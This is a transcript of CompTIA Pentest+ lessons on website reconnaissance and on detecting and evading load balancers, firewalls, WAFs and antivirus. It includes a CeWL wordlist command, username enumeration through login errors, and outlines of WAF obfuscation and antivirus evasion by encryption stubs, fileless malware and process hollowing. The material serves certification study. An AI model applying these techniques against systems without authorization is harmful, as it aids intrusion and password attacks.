CompTIA Pentest+ PT0-002 – Section 5: Active Reconnaissance Part 3

  • By
  • January 24, 2023
0 Comment

41. Website Reconnaissance (OBJ 2.3)

There are a lot of websites available online and many organizations are seriously invested in their websites to reach new customers or to sell their products to their existing customers. For this reason, you’re often going to find yourself conducting a lot of penetration tests and engagements that involve website reconnaissance and website attack and exploits. To conduct website reconnaissance and enumeration, you’re going to need to determine what type of software is used to run the organization’s website, what type of operating system the server is using as well as whether the server is hosted by the organization themselves under a first party hosting model or if it’s hosted by a third party cloud provider. During website reconnaissance and enumeration, you’re going to seek to discover the resources that are in use by that underlying server as well as any hidden information that may be exposed by the organization on their website.

When you’re investigating a website’s code, you’re going to find that they’re either individually created by a programmer or a team of programmers who built the website using HTML, CSS, JavaScript and other languages or more commonly, the site may be built on top of a content management system known as a CMS or if you’re dealing with a small business, you may find that they’re using a simple page builder instead. Now a content management system is very popular these days and the largest and most well-known of these is WordPress.

WordPress currently runs 62% of all CMS-based websites and over 37% of all internet websites rely on WordPress. Once you identify what type of software is being used to run the website such as WordPress, Drupal, Joomla, Shopify or other CMSs, you can then identify vulnerabilities that exist for those particular frameworks and platforms and then link those for use in your exploitation phase against that target organization’s website. Now if the organization created their own website from scratch using HTML, CSS, JavaScript or other languages, you’re going to have to look for vulnerabilities to attack yourself.

These include things like SQL injections, XML injections, cross-site scripting and caching server attacks. We’re going to cover all these attacks and more once we get to domain three, attacks and exploits. For now, just realize that you need to identify as much information as possible about that target website including the functions it has for e-commerce, searching of content and taking input from its end users because these are all common areas that you can exploit.

When enumerating a website, it’s important to find every page that exists on that website because any page could hold the vulnerability that becomes the key to success during your exploitation phase. For example, if you go to diontraining.com, you can click on every link on every page and in every menu to create a site map based on all the visible pages. But we have several pages that are not linked from any other pages on our website or in our website menus. For example, I have a few landing pages that we’ve created that you’re only going to get that link to if you’re part of a certain email marketing sequence in our customer relationship management system. But as a penetration tester, you need to find those pages too.

So how can you do it? Well you can do it using a technique known as website crawling or forced browsing. Website crawling is the process of systematically attempting to find every page on a given website. For example, Google search engine is constantly crawling every website in the world trying to identify every page on those sites so they can add those to their search engine. By default, these web crawlers, also known as spiders, are going to come across pages that were meant to be hidden from end users and that can cause that data to be exposed to the public.

To prevent this, web developers create a small text file called robots.txt. Now the robots.txt file is used to tell these web crawlers which directories and paths are allowed to be crawled and which ones should be ignored. As a penetration tester though, you should always check the robots.txt file because this will list areas that the web developers don’t want the public to see. To access the robots.txt file, simply go to the website’s URL and add /robots.txt to the end.

For example, you could go to diontraning.com/robots.txt right now and you’ll see a simple four-line text file displayed. The first line says user-agent: star. And this says which web crawler am I targeting to or referring for this line of the text. In my case, we have the star there, meaning that this is for all spiders or all web crawlers. If I wanted to tell just Google something, I could change that star to say user-agent colon Googlebot. The second line says disallow: /wp-admin. Now this tells us spiders for then not to search and index my /wp-admin directory. The third line says allow: /wp-admin/admin-ajax.php. This tells the spiders they’re allowed to index that PHP file called admin-ajax even though it is inside the wp-admin folder. The fourth line says sitemap: https://www.diontraining.com/wp-sitemap.xml.

Now this tells the spiders that we have a file containing all the links we want them to definitely index and we provide that in an XML format. This is known at as a sitemap. Now based on just looking at this robots.txt file, can you start to guess what kind of software our website is using at diontraining.com? If you guess WordPress, you’d be right. You can usually tell a WordPress site by seeing the /wp-admin directory. Now this is a standard configuration that’s going to be created by the default installation.

Just because you don’t see wp-admin though doesn’t mean it’s not a WordPress site because you can reconfigure that admin directory to anything you want such as /admin, /settings or even /jasondion if you really wanted to. Now with that said, from a security standpoint, you don’t want to rely on the robots.txt file to keep the bots from scanning your entire website because they sometimes will ignore the robots.txt file too. As a website owner, we need to make sure we’re enabling directory permissions to block unauthorized users and bots from getting to any content we don’t want them to see. Now website crawlers use automation techniques to follow every single link on your website, but they won’t necessarily find all the pages that aren’t linked anywhere like those landing pages I mentioned earlier on my site. To find these, you’re going to need to know the URL to go to and enter it manually in your browser or you’re going to have to use a tool like DirBuster which is a brute force browsing tool.

Now DirBuster is a free tool by OWASP that’s going to conduct brute force web crawling by trying all the various combinations of directories and file names to find hidden data. For example, if you’ve ever used a website like pastebin, you’re going to see that they save everybody’s post using a random series of uppercase letters, lowercase letter and numbers to make links that you can share your post with. If you go to pastebin.com/X24FiSMv, for example, you’re going to see I posted a short sentence as a message to my students in this course. Now without me giving you that link, it would take you a really long time to brute force the URL and find that message because it’s pretty darn random. But with enough time, DirBuster will eventually find it. Now if you use DirBuster, eventually you’re going to randomly find another URL such as pastebin.com/RMiGaVfW and if you go there, you’re going to see another post I made that is publicly available to anybody who knows that URL.

You could randomly enter combinations of eight letters and numbers and find other people’s posts by brute forcing and that’s exactly what DirBuster would do for you automatically on any given website. Now another concept in website reconnaissance is that of scraping websites, also known as web scraping, web harvesting or web data extraction. Now web scraping is a technique used for extracting data from websites by performing automation or manual processes. For example, there’s a software tool called CeWL which is C-E-W-L. This stands for custom word list generator and it works in Kali Linux. CeWL is a Ruby app that can crawl any given URL up to a specified depth and return a list of all the words that could be used with a password cracker. Now CeWL has the ability to crawl a website and create a list of every email address it finds as well if you want to set it up that way. Now both of these lists are going to be useful when trying to conduct password cracking and attacks in your exploitation phase because many people create passwords out of common words associated with their business, industry or their personal life and many usernames are actually just people’s email addresses.

For example, maybe the about us page on their website listed the CEO is married with two children, where they went to college and maybe some other details that we could feed into as potential words for the password crackers word list. That word list can then be combined as part dictionary, part brute force to create a hybrid password cracker and eventually gain access to the network. To use CeWL, you’ll simply enter the common syntax of cewl -d 1 -m 6 -w wordlist.txt https://diontraining.com. Now what this tells the tool is that it’s going to check the main webpage of diontraining.com. What this states is that CeWL will check the main webpage of diontraining.com and it’s going to scan down to a depth of one level below the top directory structure and each word it’s going to find that’s at least six letters long is going to be added to a file called wordlist.txt. If you want to learn more about CeWL, you can simply enter cewl -h at the Kali command prompt. The final thing we need to cover in website reconnaissance has more to do with enumeration of users than the website itself, but we’re going to use the organization’s website here to conduct this enumeration so I’m going to cover it in this lesson.

Now if you want to determine if a user account is valid or not, you can simply try entering it into the username field and enter any random password. Now most of the time you’re going to get an error like user does not exist in which case you know the user account name you’re trying is not going to be considered correct. On the other hand, though, if you get an error such as password incorrect, that means you know the username is correct, but you haven’t found the correct password yet. If this is the case, you can now move into the password attacks and try to gain access using that username that you’ve just discovered. This enumeration technique used to work really well in the old days, but many sites have improved their error messages to provide us with less information. For example, on my website, if you go to diontraining.com and you try to enter an email with an invalid password, we’re going to give you an error message that says invalid username or password which means you don’t know which one is wrong. It could be the user’s login or it could be the password or it could be both.

That said, many websites still do use two separate error messages, one for users such as user does not exist and one for passwords such as password incorrect. For example, when I tried to use my email and log into Facebook with a random password, I got the error message stating the email you entered isn’t connected to an account. Now this is because I use a different email to log into my Facebook account and not my work email. And so now you know regardless of what password you try, you’re never going to access my Facebook account using that particular email. In this case, if you’re conducting an engagement that involved getting into my Facebook account, you’re going to need to go back to your reconnaissance efforts to determine the correct email associated with my Facebook account and then try to crack the password again.

42. Detecting and Evading Defenses (OBJ 2.2)

In this lesson, we’re going to talk about the importance of detecting defenses during active reconnaissance, so that later you can evade those defenses as you’re moving into your attacks and exploitation phase. Now, there are a couple of key defenses that almost every network these days is going to use, this includes things like load balancers, firewalls, web application firewall and antivirus. Let’s take a look at each of these and how you can detect them and then possibly avoid them. Now, the first thing we need to detect is whether or not the organization is using a load balancer. Now, a load balancer is not necessarily a security device but it is something that can cause troubles for us as we’re trying to scan, enumerate and attack the network. So when we look at a load balancer remember that a load balancer is a core networking solution that’s going to be used to distribute traffic across multiple servers inside of a server farm.

For example, if you’re working with somebody who has a cloud based network, and you start doing scans against it, and you’re sending things into their network going to a particular server but they’re using a load balancer, well, the first request might go to server A, and the second request might go to server B, and the third request goes to server C. And so you may be getting back different answers and different responses based upon what server is actually handling the request you sent. This is why it’s important to understand if there is a load balancer or not. Now from an operation perspective, load balancers are great for an organization because they allow multiple servers to answer up as a single server. For example, on my site, we use a load balancer and we have to do that because of the number of students that are visiting our site, a single server couldn’t handle all of that load.

Now, as you start scanning, you need to identify whether or not there is load balancer. And one of the easiest ways to do this is by using a tool called LBD, or the load balancing detector. This is an app you can use inside of Kali Linux. To use the load balancing detector simply enter LBD and the domain name you want to test. For example, if you enter lbd diontrade.com, you’ll be able to check if diontrading.com is using a load balancer. And as you can see here, we are using a load balancer. You can see that both by the DNS that is using a load balancing function as well as our actual website itself, and it returns the two IP addresses that are found as part of our load balancing configuration. So why are load so important to understand as you’re doing your reconnaissance and enumeration? Well, it all goes back to scanning. If the organization is using a load balancer it can really throw off your scan results and create a lot of false positives or false negatives for you.

The next thing we need to discuss is firewalls. Now, if you think back to your earlier studies, you should remember that a firewall is a type of networks security device that monitors and filters incoming and outgoing network traffic based upon the organization’s established security policies. Normally this is done by using access control lists. At their most basic level, firewalls are simply there to act as a barrier device that sits between the private and trusted internal network and the public or exposed external network known as the internet. As I said, firewalls really rely on the set of rules known as an access control list or ACL. Most of these rules are going to be based either on the destinations, port and IP address, or the source port and IP address, as well as the protocol type and payload. To be able to detect whether or not an organization is using a firewall, one of the easiest ways to do this is simply by running a trace route. If you do a trace route from your machine to your destination and you see there are not responses coming back clearly and instead you’re seeing stars in the place where those responses should be, that is indicating that there is some sort of a security device there; whether that’s a firewall, a router with an ACL that’s not responding back, or a unified threat management system. There are lots of different tools out there to help you map out a firewall, and one of the most common is known as Firewalk.

Now, Firewalk can be used inside a Kali Linux and you’ll specify the command Firewalk, the ports you want to use as well as the interface and then the target. When you do this, it’s going to start going to through those targets on those ports to be able to start figuring out what responses it can get and which ports are open, which ones are closed, which ones are being filtered, and more importantly, what those ACL rules might look like. Firewalk is considered an active reconnaissance tool and its job is to try to determine what layer for protocols a given firewall will actually pass past it. And this helps you map out the ACL rule sets. This works by sending out either TCP or UDP packets with a time to live that is one hop greater than the expected targeted gateways. If the firewall or gateway allows the traffic to pass through it, it’s going to forward the traffic to the next hop and at that point because the time to live was set at one hop more it’s going to respond back with an ICMP time exceeded message. Otherwise it’s going to drop that packet and there’ll be no response.

By collecting these series of response and non-responses, we can determine what ACL rules are in place and then we can figure out how we can better evade that firewall or bypass that firewall during our attacks and exploits. The real benefit of using firewalking versus just doing port scanning is that you’re actually trying to move through that firewall and identify what those rules sets are. This is how you can start mapping out the internal network as opposed to just the boundary device that you’re seeing with the firewall when you do a regular port scan. Now, in addition to a regular firewall we also have a specialized type of firewall called a web application firewall or layer 7 firewall.

This is a specialized type of firewall that’s designed to monitor web applications and prevent attacks against them, things like SQL injections, directory traversals and cross site scripting attacks. Now to detect if there’s a web application firewall in place, there’s a couple of key giveaways you should be looking for. Most web application firewalls will add a personalized cookie in the HTTP packets that they’re sending back to somebody who’s scanning them or somebody who’s tryna send data through a web application firewall.

By looking at those cookies in the HTTP packets, you can identify if there’s a web application firewall in place. Some other web application firewalls will actually use header alteration which changes the original response header to help confuse the attacker. So if you start seeing header responses that look abnormal, there may be a web application firewall in place. And also sometimes the web application firewalls are just very blatant about the fact that they’re there. They may send you back a page or a header that says, this site has blocked your request because it’s protect it by X, Y, Z web application firewall.

As far as evading these web application firewalls and getting your attacks through them, what you’re going to have to do is use obfuscation to be able to confuse these devices by making it so they can’t see the data as easily. As we talked about URL analysis, some of that was being done in an effort to bypass web application firewalls, because if they’re looking for something like a space but you use percent to zero instead that is a form of obfuscation that can actually get past a web application firewall depending on how it’s configured.

Now, the final thing we need to talk about is antivirus. Now, antivirus is a specific type of software that’s to prevent, scan, detect and delete viruses or malware from a computer. Once it’s installed, most antivirus software will run automatically in the background to provide real time protection against virus attacks. Now, what is the problem with antivirus? Well, when we’re doing scanning it’s usually not a big deal here in the reconnaissance phase, but as we move into the attacks and exploits it can become a real problem for us. A lot of times, the malware we’re going to give as part of a spear phishing campaign or other exploit will actually be installed on the machine, but if that person has antivirus installed it can detect that and then block it from actually running the payload effectively killing our attack. While that’s good for the company, it’s not very good for us as penetration testers.

So we need to find ways to bypass that and to be able to get past these antivirus systems. Now there’s a couple of ways you can do this; one is that you can create a metamorphic virus. This will actually transform the virus as it propagates around the network and this changing pattern makes it harder for antivirus to detect. Remember, most of the effective antivirus solutions that are out there are actually based on signatures.

And so if you change the signature by jumbling up the code or modifying the code, that can actually create a way for you to get past those systems. Another way to do this is by obfuscating unknown signature by using specialized tools. This will actually allow you to change the code that you’re doing for your exploit similar to a metamorphic virus. Now with a metamorphic virus it’s going to continue to change as it propagates, but when we’re dealing with something like obfuscation of our own code or our own exploits, we’re only doing it on a one-time basis for this particular attack.

Another thing you can do is use specialized tools or payloads that use fileless malware, because a lot of operating system embedded functions can actually be used to conduct malicious activities for you. These include things like PowerShell scripts, commandlets, bash utilities and others. These become very difficult to detect and it’s basically another form of leaving off the land. Another method is to use encryption.

Now by using encryption you can effectively eliminate the ability for that antivirus program to detect the malware through using signatures alone. Now, malware authors and penetration testers will often encrypt their malicious payloads. This allows them to encrypt the file and attach a stub which is simply a program that will decrypt the contents and execute them once they’re on the victim’s machine. Some common ways to execute this is by using process injection or process hollowing, which will talk about more when we get to attacks and exploits. As you can see, it’s important to detect load balancers, firewalls, web application firewalls and antivirus software back here in your reconnaissance and information gathering phase, because that’s going to allow us to prepare for how we’re going to evade them later when we get to our attacks and exploits phase.

Comments
* The most recent comment are at the top

Interesting posts

The Growing Demand for IT Certifications in the Fintech Industry

The fintech industry is experiencing an unprecedented boom, driven by the relentless pace of technological innovation and the increasing integration of financial services with digital platforms. As the lines between finance and technology blur, the need for highly skilled professionals who can navigate both worlds is greater than ever. One of the most effective ways… Read More »

CompTIA Security+ vs. CEH: Entry-Level Cybersecurity Certifications Compared

In today’s digital world, cybersecurity is no longer just a technical concern; it’s a critical business priority. With cyber threats evolving rapidly, organizations of all sizes are seeking skilled professionals to protect their digital assets. For those looking to break into the cybersecurity field, earning a certification is a great way to validate your skills… Read More »

The Evolving Role of ITIL: What’s New in ITIL 4 Managing Professional Transition Exam?

If you’ve been in the IT service management (ITSM) world for a while, you’ve probably heard of ITIL – the framework that’s been guiding IT professionals in delivering high-quality services for decades. The Information Technology Infrastructure Library (ITIL) has evolved significantly over the years, and its latest iteration, ITIL 4, marks a substantial shift in… Read More »

SASE and Zero Trust: How New Security Architectures are Shaping Cisco’s CyberOps Certification

As cybersecurity threats become increasingly sophisticated and pervasive, traditional security models are proving inadequate for today’s complex digital environments. To address these challenges, modern security frameworks such as SASE (Secure Access Service Edge) and Zero Trust are revolutionizing how organizations protect their networks and data. Recognizing the shift towards these advanced security architectures, Cisco has… Read More »

CompTIA’s CASP+ (CAS-004) Gets Tougher: What’s New in Advanced Security Practitioner Certification?

The cybersecurity landscape is constantly evolving, and with it, the certifications that validate the expertise of security professionals must adapt to address new challenges and technologies. CompTIA’s CASP+ (CompTIA Advanced Security Practitioner) certification has long been a hallmark of advanced knowledge in cybersecurity, distinguishing those who are capable of designing, implementing, and managing enterprise-level security… Read More »

Azure DevOps Engineer Expert Certification: What’s Changed in the New AZ-400 Exam Blueprint?

The cloud landscape is evolving at a breakneck pace, and with it, the certifications that validate an IT professional’s skills. One such certification is the Microsoft Certified: DevOps Engineer Expert, which is validated through the AZ-400 exam. This exam has undergone significant changes to reflect the latest trends, tools, and methodologies in the DevOps world.… Read More »

img